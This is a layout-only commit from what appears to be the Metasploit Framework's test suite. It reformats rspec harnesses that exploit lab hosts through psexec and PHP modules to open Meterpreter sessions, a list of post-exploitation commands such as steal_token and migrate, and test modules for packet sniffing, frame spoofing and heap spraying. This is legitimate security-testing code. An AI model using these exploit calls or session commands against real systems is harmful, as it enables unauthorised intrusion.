Run rubocop --fix-layout test
This commit is contained in:
parent
bf00619717
commit
29cc349649
|
@ -7,22 +7,17 @@ require 'fileutils'
|
|||
require 'msf_matchers'
|
||||
require 'msf_test_case'
|
||||
|
||||
|
||||
module MsfTest
|
||||
include MsfTest::MsfMatchers
|
||||
|
||||
include MsfTest::MsfMatchers
|
||||
|
||||
|
||||
## This spec exists to help us describe the behavior of msfconsole - TODO
|
||||
|
||||
describe "Msfconsole" do
|
||||
## This spec exists to help us describe the behavior of msfconsole - TODO
|
||||
|
||||
describe "Msfconsole" do
|
||||
###
|
||||
# Setup!
|
||||
###
|
||||
|
||||
before :all do
|
||||
|
||||
@working_directory = File.dirname(__FILE__)
|
||||
|
||||
## Static specs will make use of RC files here
|
||||
|
@ -43,12 +38,11 @@ describe "Msfconsole" do
|
|||
end
|
||||
|
||||
after :each do
|
||||
|
||||
end
|
||||
|
||||
after :all do
|
||||
## Clean up
|
||||
#FileUtils.rm_rf(@temp_directory)
|
||||
# FileUtils.rm_rf(@temp_directory)
|
||||
end
|
||||
|
||||
###
|
||||
|
@ -56,11 +50,13 @@ describe "Msfconsole" do
|
|||
###
|
||||
|
||||
it "should start and let us run help" do
|
||||
data = start_console_and_run_rc("help","#{@static_resource_directory}/help.rc")
|
||||
data = start_console_and_run_rc("help", "#{@static_resource_directory}/help.rc")
|
||||
|
||||
success_strings = [ 'help',
|
||||
success_strings = [
|
||||
'help',
|
||||
'Database Backend Commands',
|
||||
'Core Commands' ]
|
||||
'Core Commands'
|
||||
]
|
||||
failure_strings = [] | generic_failure_strings
|
||||
failure_exception_strings = [] | generic_failure_exception_strings
|
||||
|
||||
|
@ -106,7 +102,6 @@ describe "Msfconsole" do
|
|||
Dir.mkdir(@temp_output_directory)
|
||||
|
||||
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
|
||||
|
||||
## Parse this test case
|
||||
test_case = MsfTestCase.new(filename)
|
||||
puts "Found #{test_case.name} in: #{filename}"
|
||||
|
@ -117,22 +112,21 @@ describe "Msfconsole" do
|
|||
|
||||
## Create the rspec Test Case
|
||||
it "should #{test_case.name}" do
|
||||
|
||||
## Gather the success / failure strings, and combine with the generics
|
||||
success_strings = test_case.expected_successes
|
||||
failure_strings = test_case.expected_failures | generic_failure_strings
|
||||
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
|
||||
|
||||
## run the commands
|
||||
data = start_console_and_run_rc( test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
|
||||
data = start_console_and_run_rc(test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
|
||||
|
||||
## check the output
|
||||
data.should contain_all_successes(success_strings)
|
||||
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
|
||||
|
||||
## Clean up
|
||||
#File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
|
||||
#File.delete("#{@temp_output_directory}/#{test_case.name}")
|
||||
# File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
|
||||
# File.delete("#{@temp_output_directory}/#{test_case.name}")
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -151,7 +145,7 @@ describe "Msfconsole" do
|
|||
[]
|
||||
end
|
||||
|
||||
def start_console_and_run_rc(name,rc_file, database_file=false)
|
||||
def start_console_and_run_rc(name, rc_file, database_file = false)
|
||||
output_file = "#{@temp_output_directory}/#{name}"
|
||||
|
||||
if database_file
|
||||
|
@ -172,10 +166,11 @@ describe "Msfconsole" do
|
|||
|
||||
## Fire it off against a known-vulnerable host
|
||||
session = @framework.exploits.create(exploit_name).exploit_simple(
|
||||
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
|
||||
'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
|
||||
'Payload' => payload_name,
|
||||
'LocalInput' => input,
|
||||
'LocalOutput' => output)
|
||||
'LocalOutput' => output
|
||||
)
|
||||
|
||||
## If a session came back, try to interact with it.
|
||||
if session
|
||||
|
@ -189,7 +184,6 @@ describe "Msfconsole" do
|
|||
raise "Not Implemented"
|
||||
end
|
||||
|
||||
|
||||
def generate_java_meterpreter_session(input, output)
|
||||
raise "Not Implemented"
|
||||
end
|
||||
|
@ -206,5 +200,5 @@ describe "Msfconsole" do
|
|||
end
|
||||
return data
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,19 +1,15 @@
|
|||
module MsfTest
|
||||
module JavaMeterpreterSpecs
|
||||
|
||||
module JavaMeterpreterSpecs
|
||||
## This file is intended to be used in conjunction with a harness,
|
||||
## such as meterpreter_win32_spec.rb
|
||||
|
||||
def self.included(base)
|
||||
base.class_eval do
|
||||
|
||||
it "should not error when taking a screenshot" do
|
||||
success_strings = [ 'Screenshot saved to' ]
|
||||
hlp_run_command_check_output("screenshot","screenshot", success_strings)
|
||||
end
|
||||
|
||||
hlp_run_command_check_output("screenshot", "screenshot", success_strings)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -7,9 +7,7 @@ require 'meterpreter_spec_helper'
|
|||
require 'meterpreter_specs'
|
||||
|
||||
module MsfTest
|
||||
|
||||
describe "JavaMeterpreter" do
|
||||
|
||||
describe "JavaMeterpreter" do
|
||||
# This include brings in all the spec helper methods
|
||||
include MsfTest::MeterpreterSpecHelper
|
||||
|
||||
|
@ -40,7 +38,6 @@ describe "JavaMeterpreter" do
|
|||
end
|
||||
|
||||
before :each do
|
||||
|
||||
end
|
||||
|
||||
after :each do
|
||||
|
@ -48,14 +45,12 @@ describe "JavaMeterpreter" do
|
|||
end
|
||||
|
||||
after :all do
|
||||
#FileUtils.rm_rf("*.jpeg")
|
||||
#FileUtils.rm_rf("payload.jar")
|
||||
# FileUtils.rm_rf("*.jpeg")
|
||||
# FileUtils.rm_rf("payload.jar")
|
||||
FileUtils.rm_rf(@output_directory)
|
||||
end
|
||||
|
||||
|
||||
def create_session_java
|
||||
|
||||
## Setup for win32
|
||||
@framework = Msf::Simple::Framework.create
|
||||
|
||||
|
@ -75,7 +70,8 @@ describe "JavaMeterpreter" do
|
|||
'Options' => {},
|
||||
'Payload' => @payload_name,
|
||||
'LocalInput' => @input,
|
||||
'LocalOutput' => @output)
|
||||
'LocalOutput' => @output
|
||||
)
|
||||
|
||||
puts @session.inspect
|
||||
|
||||
|
@ -86,6 +82,5 @@ describe "JavaMeterpreter" do
|
|||
raise Exception "Couldn't get a session!"
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -7,9 +7,7 @@ require 'meterpreter_spec_helper'
|
|||
require 'meterpreter_specs'
|
||||
|
||||
module MsfTest
|
||||
|
||||
describe "PhpMeterpreter" do
|
||||
|
||||
describe "PhpMeterpreter" do
|
||||
# This include brings in all the spec helper methods
|
||||
include MsfTest::MeterpreterSpecHelper
|
||||
|
||||
|
@ -36,7 +34,6 @@ describe "PhpMeterpreter" do
|
|||
end
|
||||
|
||||
before :each do
|
||||
|
||||
end
|
||||
|
||||
after :each do
|
||||
|
@ -47,9 +44,7 @@ describe "PhpMeterpreter" do
|
|||
FileUtils.rm_rf(@output_directory)
|
||||
end
|
||||
|
||||
|
||||
def create_session_php
|
||||
|
||||
## Setup for php
|
||||
@framework = Msf::Simple::Framework.create
|
||||
|
||||
|
@ -63,10 +58,11 @@ describe "PhpMeterpreter" do
|
|||
|
||||
## Fire it off against a known-vulnerable host
|
||||
@session = exploit.exploit_simple(
|
||||
'Options' => {'RHOST' => "metasploitable"},
|
||||
'Options' => { 'RHOST' => "metasploitable" },
|
||||
'Payload' => @payload_name,
|
||||
'LocalInput' => @input,
|
||||
'LocalOutput' => @output)
|
||||
'LocalOutput' => @output
|
||||
)
|
||||
|
||||
puts @session.inspect
|
||||
|
||||
|
@ -77,6 +73,5 @@ describe "PhpMeterpreter" do
|
|||
raise Exception "Couldn't get a session!"
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,19 +1,16 @@
|
|||
module MsfTest
|
||||
module MeterpreterSpecHelper
|
||||
|
||||
module MeterpreterSpecHelper
|
||||
def self.included(base)
|
||||
base.class_eval do
|
||||
|
||||
def generic_failure_strings
|
||||
['fail', 'error', 'exception']
|
||||
end
|
||||
|
||||
def generic_failure_exception_strings
|
||||
['nserror.dll', 'tiki-error.php','tiki-error_simple.php','tiki-rss_error.php'] ##ugh, this is dependent on the target
|
||||
['nserror.dll', 'tiki-error.php', 'tiki-error_simple.php', 'tiki-rss_error.php'] # #ugh, this is dependent on the target
|
||||
end
|
||||
|
||||
def hlp_run_command_check_output(name,command,success_strings=[],fail_strings=[], fail_exception_strings=[])
|
||||
|
||||
def hlp_run_command_check_output(name, command, success_strings = [], fail_strings = [], fail_exception_strings = [])
|
||||
fail_strings = fail_strings | generic_failure_strings
|
||||
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
|
||||
|
||||
|
@ -54,5 +51,5 @@ module MeterpreterSpecHelper
|
|||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,11 +1,10 @@
|
|||
module MsfTest
|
||||
module MeterpreterSpecs
|
||||
|
||||
module MeterpreterSpecs
|
||||
def self.included(base)
|
||||
base.class_eval do
|
||||
|
||||
it "should not error when running each command" do
|
||||
commands = [ "?",
|
||||
commands = [
|
||||
"?",
|
||||
"background",
|
||||
"bgkill",
|
||||
"bglist",
|
||||
|
@ -15,9 +14,9 @@ module MeterpreterSpecs
|
|||
"exit",
|
||||
"help",
|
||||
"interact",
|
||||
#"irb",
|
||||
# "irb",
|
||||
"migrate",
|
||||
#"quit",
|
||||
# "quit",
|
||||
"read",
|
||||
"run",
|
||||
"use",
|
||||
|
@ -27,7 +26,7 @@ module MeterpreterSpecs
|
|||
"cd",
|
||||
"del",
|
||||
"download",
|
||||
#"edit",
|
||||
# "edit",
|
||||
"getlwd",
|
||||
"getwd",
|
||||
"lcd",
|
||||
|
@ -50,11 +49,11 @@ module MeterpreterSpecs
|
|||
"getuid",
|
||||
"kill",
|
||||
"ps",
|
||||
#"reboot",
|
||||
# "reboot",
|
||||
"reg",
|
||||
"rev2self",
|
||||
#"shell",
|
||||
#"shutdown",
|
||||
# "shell",
|
||||
# "shutdown",
|
||||
"steal_token",
|
||||
"sysinfo",
|
||||
"enumdesktops",
|
||||
|
@ -73,37 +72,39 @@ module MeterpreterSpecs
|
|||
|
||||
## Run each command, check for execeptions
|
||||
commands.each do |command|
|
||||
hlp_run_command_check_output("basic_#{command}",command)
|
||||
hlp_run_command_check_output("basic_#{command}", command)
|
||||
end
|
||||
end
|
||||
|
||||
it "should not error when running help" do
|
||||
success_strings = [ 'Core Commands',
|
||||
success_strings = [
|
||||
'Core Commands',
|
||||
'Stdapi: File system Commands',
|
||||
'Stdapi: Networking Commands',
|
||||
'Stdapi: System Commands',
|
||||
'Stdapi: User interface Commands']
|
||||
'Stdapi: User interface Commands'
|
||||
]
|
||||
|
||||
hlp_run_command_check_output("help","help", success_strings)
|
||||
hlp_run_command_check_output("help", "help", success_strings)
|
||||
end
|
||||
|
||||
it "should not error when running the help shortcut" do
|
||||
success_strings = [ 'Core Commands',
|
||||
success_strings = [
|
||||
'Core Commands',
|
||||
'Stdapi: File system Commands',
|
||||
'Stdapi: Networking Commands',
|
||||
'Stdapi: System Commands',
|
||||
'Stdapi: User interface Commands' ]
|
||||
'Stdapi: User interface Commands'
|
||||
]
|
||||
|
||||
hlp_run_command_check_output("help_shortcut","?", success_strings)
|
||||
hlp_run_command_check_output("help_shortcut", "?", success_strings)
|
||||
end
|
||||
|
||||
it "should not error when checking for background channels" do
|
||||
success_strings = [ 'No active channels.' ]
|
||||
hlp_run_command_check_output("channel_list_empty","channel -l", success_strings)
|
||||
end
|
||||
|
||||
hlp_run_command_check_output("channel_list_empty", "channel -l", success_strings)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -10,13 +10,10 @@ require 'meterpreter_specs'
|
|||
require 'windows_meterpreter_specs'
|
||||
|
||||
module MsfTest
|
||||
|
||||
describe "Win32Meterpreter" do
|
||||
|
||||
describe "Win32Meterpreter" do
|
||||
# Include Custom Matchers
|
||||
include MsfTest::MsfMatchers
|
||||
|
||||
|
||||
# This include brings in all the spec helper methods
|
||||
include MsfTest::MeterpreterSpecHelper
|
||||
|
||||
|
@ -47,7 +44,6 @@ describe "Win32Meterpreter" do
|
|||
end
|
||||
|
||||
before :each do
|
||||
|
||||
end
|
||||
|
||||
after :each do
|
||||
|
@ -55,7 +51,6 @@ describe "Win32Meterpreter" do
|
|||
end
|
||||
|
||||
after :all do
|
||||
|
||||
## Clean up test output
|
||||
FileUtils.rm_rf(@output_directory)
|
||||
|
||||
|
@ -67,11 +62,9 @@ describe "Win32Meterpreter" do
|
|||
File.delete(file)
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def create_session_windows_x32
|
||||
|
||||
## Setup for win32
|
||||
@framework = Msf::Simple::Framework.create
|
||||
@exploit_name = 'windows/smb/psexec'
|
||||
|
@ -84,10 +77,11 @@ describe "Win32Meterpreter" do
|
|||
|
||||
## Fire it off against a known-vulnerable host
|
||||
@session = exploit.exploit_simple(
|
||||
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
|
||||
'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
|
||||
'Payload' => @payload_name,
|
||||
'LocalInput' => @input,
|
||||
'LocalOutput' => @output)
|
||||
'LocalOutput' => @output
|
||||
)
|
||||
|
||||
## If a session came back, try to interact with it.
|
||||
if @session
|
||||
|
@ -95,9 +89,8 @@ describe "Win32Meterpreter" do
|
|||
@session.load_stdapi
|
||||
else
|
||||
puts "unable to get session"
|
||||
#flunk "Couldn't get a session!"
|
||||
# flunk "Couldn't get a session!"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
module MsfTest
|
||||
module WindowsMeterpreterSpecs
|
||||
|
||||
module WindowsMeterpreterSpecs
|
||||
## This file is intended to be used in conjunction with a harness,
|
||||
## such as meterpreter_win32_spec.rb
|
||||
|
||||
def self.included(base)
|
||||
base.class_eval do
|
||||
|
||||
it "should not error when uploading a file to a windows box" do
|
||||
upload_success_strings = [ 'uploading',
|
||||
'uploaded' ]
|
||||
upload_success_strings = [
|
||||
'uploading',
|
||||
'uploaded'
|
||||
]
|
||||
|
||||
## create a file to upload
|
||||
filename = "/tmp/whatever"
|
||||
|
@ -19,31 +19,28 @@ module WindowsMeterpreterSpecs
|
|||
hlp_string_to_file("owned!", filename)
|
||||
|
||||
## run the upload / quit commands
|
||||
hlp_run_command_check_output("upload","upload #{filename} C:\\", upload_success_strings)
|
||||
#hlp_run_command_check_output("quit","quit")
|
||||
hlp_run_command_check_output("upload", "upload #{filename} C:\\", upload_success_strings)
|
||||
# hlp_run_command_check_output("quit","quit")
|
||||
|
||||
## clean up
|
||||
FileUtils.rm(filename)
|
||||
end
|
||||
|
||||
|
||||
it "should show the priv commands when running help" do
|
||||
|
||||
success_strings = ['Priv: Elevate Commands',
|
||||
success_strings = [
|
||||
'Priv: Elevate Commands',
|
||||
'Priv: Password database Commands',
|
||||
'Priv: Timestomp Commands' ]
|
||||
|
||||
hlp_run_command_check_output("help_shortcut","help", success_strings)
|
||||
'Priv: Timestomp Commands'
|
||||
]
|
||||
|
||||
hlp_run_command_check_output("help_shortcut", "help", success_strings)
|
||||
end
|
||||
|
||||
it "should not error when taking a screenshot" do
|
||||
success_strings = [ 'Screenshot saved to' ]
|
||||
hlp_run_command_check_output("screenshot","screenshot", success_strings)
|
||||
end
|
||||
|
||||
hlp_run_command_check_output("screenshot", "screenshot", success_strings)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
class Array
|
||||
@@to_s_reported = {}
|
||||
def to_s(*args)
|
||||
if(not @@to_s_reported[caller[0].to_s])
|
||||
if (not @@to_s_reported[caller[0].to_s])
|
||||
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
|
||||
@@to_s_reported[caller[0].to_s] = true
|
||||
end
|
||||
|
|
|
@ -1,7 +1,6 @@
|
|||
class String
|
||||
@@idx_reported = {}
|
||||
def [](*args)
|
||||
|
||||
if args.length == 1 && args[0].class == ::Integer && !@@idx_reported[caller[0].to_s]
|
||||
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
|
||||
@@idx_reported[caller[0].to_s] = true
|
||||
|
|
|
@ -1,12 +1,9 @@
|
|||
|
||||
|
||||
module Msf
|
||||
|
||||
module ModuleTest
|
||||
module ModuleTest
|
||||
attr_accessor :tests
|
||||
attr_accessor :failures
|
||||
|
||||
def initialize(info={})
|
||||
def initialize(info = {})
|
||||
@tests = 0
|
||||
@failures = 0
|
||||
super
|
||||
|
@ -17,10 +14,9 @@ module ModuleTest
|
|||
tests.each { |test_method|
|
||||
self.send(test_method)
|
||||
}
|
||||
|
||||
end
|
||||
|
||||
def it(msg="", &block)
|
||||
def it(msg = "", &block)
|
||||
@tests += 1
|
||||
begin
|
||||
result = block.call
|
||||
|
@ -41,12 +37,12 @@ module ModuleTest
|
|||
print_good("#{msg}")
|
||||
end
|
||||
|
||||
def pending(msg="", &block)
|
||||
def pending(msg = "", &block)
|
||||
print_status("PENDING: #{msg}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
module ModuleTest::PostTest
|
||||
module ModuleTest::PostTest
|
||||
include ModuleTest
|
||||
def run
|
||||
print_status("Running against session #{datastore["SESSION"]}")
|
||||
|
@ -63,6 +59,5 @@ module ModuleTest::PostTest
|
|||
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -2,9 +2,7 @@ $:.unshift(File.join((File.dirname(__FILE__))))
|
|||
require 'regexr'
|
||||
|
||||
module MsfTest
|
||||
|
||||
module MsfMatchers
|
||||
|
||||
module MsfMatchers
|
||||
class ContainACompleteTest
|
||||
|
||||
def initialize()
|
||||
|
@ -13,7 +11,7 @@ module MsfMatchers
|
|||
|
||||
def matches?(data)
|
||||
@data = data
|
||||
return @r.verify_start_and_end(@data,"meterpreter_functional_test_start", "meterpreter_functional_test_end")
|
||||
return @r.verify_start_and_end(@data, "meterpreter_functional_test_start", "meterpreter_functional_test_end")
|
||||
end
|
||||
|
||||
def failure_message
|
||||
|
@ -32,15 +30,16 @@ module MsfMatchers
|
|||
|
||||
class ContainAllSuccesses
|
||||
|
||||
def initialize(successes=[])
|
||||
def initialize(successes = [])
|
||||
@successes = successes
|
||||
@r = Regexr.new(true)
|
||||
end
|
||||
|
||||
def matches?(data)
|
||||
@data = data
|
||||
@string = @r.find_strings_that_dont_exist_in_data(@data,@successes)
|
||||
@string = @r.find_strings_that_dont_exist_in_data(@data, @successes)
|
||||
return true if !@string
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
|
@ -52,16 +51,16 @@ module MsfMatchers
|
|||
"expected to miss successes but found'm all :("
|
||||
end
|
||||
|
||||
#alias :have_all_successes :contain_all_successes
|
||||
# alias :have_all_successes :contain_all_successes
|
||||
end
|
||||
|
||||
def contain_all_successes(successes=[])
|
||||
def contain_all_successes(successes = [])
|
||||
ContainAllSuccesses.new(successes)
|
||||
end
|
||||
|
||||
class ContainNoFailuresExcept
|
||||
|
||||
def initialize(failures=[],exceptions=[])
|
||||
def initialize(failures = [], exceptions = [])
|
||||
@failures = failures
|
||||
@exceptions = exceptions
|
||||
@r = Regexr.new(true)
|
||||
|
@ -69,8 +68,9 @@ module MsfMatchers
|
|||
|
||||
def matches?(data)
|
||||
@data = data
|
||||
@string = @r.find_strings_that_exist_in_data_except(@data,@failures,@exceptions)
|
||||
@string = @r.find_strings_that_exist_in_data_except(@data, @failures, @exceptions)
|
||||
return true if !@string
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
|
@ -82,13 +82,11 @@ module MsfMatchers
|
|||
"expected to find failures, but didn't find any :("
|
||||
end
|
||||
|
||||
#alias :have_no_failures :contain_no_failures
|
||||
# alias :have_no_failures :contain_no_failures
|
||||
end
|
||||
|
||||
def contain_no_failures_except(failures=[],exceptions=[])
|
||||
ContainNoFailuresExcept.new(failures,exceptions)
|
||||
def contain_no_failures_except(failures = [], exceptions = [])
|
||||
ContainNoFailuresExcept.new(failures, exceptions)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -6,13 +6,13 @@
|
|||
|
||||
class Regexr
|
||||
|
||||
def initialize(verbose=false, case_insensitive=true)
|
||||
def initialize(verbose = false, case_insensitive = true)
|
||||
@verbose = verbose
|
||||
@case_insensitive = case_insensitive
|
||||
end
|
||||
|
||||
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
|
||||
def verify_start_and_end(data,the_start,the_end)
|
||||
def verify_start_and_end(data, the_start, the_end)
|
||||
return false unless data
|
||||
|
||||
data_lines = data.split("\n")
|
||||
|
@ -27,7 +27,7 @@ class Regexr
|
|||
end
|
||||
|
||||
# Scan for any number of success lines. In order to pass, all successes must match.
|
||||
def find_strings_that_dont_exist_in_data(data,regexes=[])
|
||||
def find_strings_that_dont_exist_in_data(data, regexes = [])
|
||||
return false unless data
|
||||
|
||||
data_lines = data.split("\n")
|
||||
|
@ -38,15 +38,13 @@ class Regexr
|
|||
target_successes = regexes.size
|
||||
success_count = 0
|
||||
regexes.each { |condition|
|
||||
|
||||
## assume we haven't got it
|
||||
found = false
|
||||
|
||||
re = Regexp.new(condition, @case_insensitive)
|
||||
|
||||
## for each of our data lines
|
||||
data_lines.each {|line|
|
||||
|
||||
data_lines.each { |line|
|
||||
## if it's a match
|
||||
if line =~ re
|
||||
found = true
|
||||
|
@ -64,8 +62,7 @@ class Regexr
|
|||
end
|
||||
|
||||
# Scan for failures -- if any single failure matches, the test returns true.
|
||||
def find_strings_that_exist_in_data_except(data,regexes=[],exceptions=[])
|
||||
|
||||
def find_strings_that_exist_in_data_except(data, regexes = [], exceptions = [])
|
||||
return false unless data
|
||||
|
||||
data_lines = data.split("\n")
|
||||
|
@ -73,7 +70,6 @@ class Regexr
|
|||
return nil unless regexes ## count as a pass
|
||||
|
||||
regexes.each { |condition|
|
||||
|
||||
## for each failure condition that we've been passed
|
||||
re = Regexp.new(condition, @case_insensitive)
|
||||
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
|
@ -16,12 +14,10 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'Description' => 'This module sniffs HTTP GET requests from the network',
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
'Actions' => [
|
||||
[ 'Sniffer' ]
|
||||
],
|
||||
'PassiveActions' =>
|
||||
[
|
||||
'PassiveActions' => [
|
||||
'Sniffer'
|
||||
],
|
||||
'DefaultAction' => 'Sniffer'
|
||||
|
@ -39,16 +35,15 @@ class MetasploitModule < Msf::Auxiliary
|
|||
p = PacketFu::Packet.parse(pkt)
|
||||
next unless p.is_tcp?
|
||||
next if p.payload.empty?
|
||||
|
||||
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
|
||||
url = $1
|
||||
print_status("GET #{url}")
|
||||
break if url =~ /StopCapture/
|
||||
end
|
||||
|
||||
end
|
||||
close_pcap()
|
||||
print_status("Finished sniffing")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,33 +3,34 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "Check Test",
|
||||
'Description' => %q{
|
||||
This module ensures that 'check' actually functions for Auxiilary modules.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
'References' => [
|
||||
[ 'OSVDB', '0' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Author' => [
|
||||
'todb'
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80)
|
||||
], self.class)
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
|
@ -16,8 +14,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'Description' => 'This module sends spoofed ethernet frames',
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
'Actions' => [
|
||||
[ 'Spoofer' ]
|
||||
],
|
||||
'DefaultAction' => 'Spoofer'
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
|
@ -16,7 +15,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
|
||||
|
@ -25,7 +23,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
|
||||
begin
|
||||
if (not connect_login)
|
||||
return
|
||||
|
@ -34,24 +31,24 @@ class MetasploitModule < Msf::Auxiliary
|
|||
curdir = ""
|
||||
|
||||
# change to the upload directory
|
||||
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true )
|
||||
result = send_cmd(["CWD", datastore['UPLOADDIR']], true)
|
||||
print_status("CWD response: #{result.inspect}")
|
||||
|
||||
# find out what the server thinks this dir is
|
||||
result = send_cmd( ["PWD"], true )
|
||||
result = send_cmd(["PWD"], true)
|
||||
print_status("PWD response: #{result.inspect}")
|
||||
if (result =~ /257\s\"(.+)\"/)
|
||||
curdir = $1
|
||||
end
|
||||
curdir = "/" + curdir if curdir[0] != "/"
|
||||
curdir << "/" if curdir[-1,1] != "/"
|
||||
curdir << "/" if curdir[-1, 1] != "/"
|
||||
|
||||
# generate some data to upload
|
||||
data = Rex::Text.rand_text_alphanumeric(1024)
|
||||
#print_status("data:\n" + Rex::Text.to_hex_dump(data))
|
||||
# print_status("data:\n" + Rex::Text.to_hex_dump(data))
|
||||
|
||||
# test putting data
|
||||
result = send_cmd_data(["PUT", curdir+"test"], data, "I")
|
||||
result = send_cmd_data(["PUT", curdir + "test"], data, "I")
|
||||
print_status("PUT response: #{result.inspect}")
|
||||
|
||||
# test fallthrough
|
||||
|
@ -63,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
print_status("LS response: #{result.inspect}")
|
||||
|
||||
# test getting file
|
||||
result = send_cmd_data(["GET", curdir+"test"], "A")
|
||||
result = send_cmd_data(["GET", curdir + "test"], "A")
|
||||
print_status("GET response: #{result[0].inspect}")
|
||||
|
||||
# see if it matches
|
||||
|
@ -74,13 +71,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
# adios
|
||||
result = send_cmd( ["QUIT"], true )
|
||||
result = send_cmd(["QUIT"], true)
|
||||
print_status("QUIT response: #{result.inspect}")
|
||||
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -3,35 +3,35 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "Heaplib2 Test",
|
||||
'Description' => %q{
|
||||
This tests heaplib2. Since it is a test module, it's not intended to do much useful work in the field.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'sinn3r' ],
|
||||
'References' =>
|
||||
[
|
||||
'References' => [
|
||||
[ 'URL', 'https://metasploit.com' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
'Targets' => [
|
||||
[ 'Automatic', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => '2014-03-01',
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
spray = %Q|
|
||||
function log(msg) {
|
||||
|
@ -71,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
|
||||
|
||||
print_status("Sending html")
|
||||
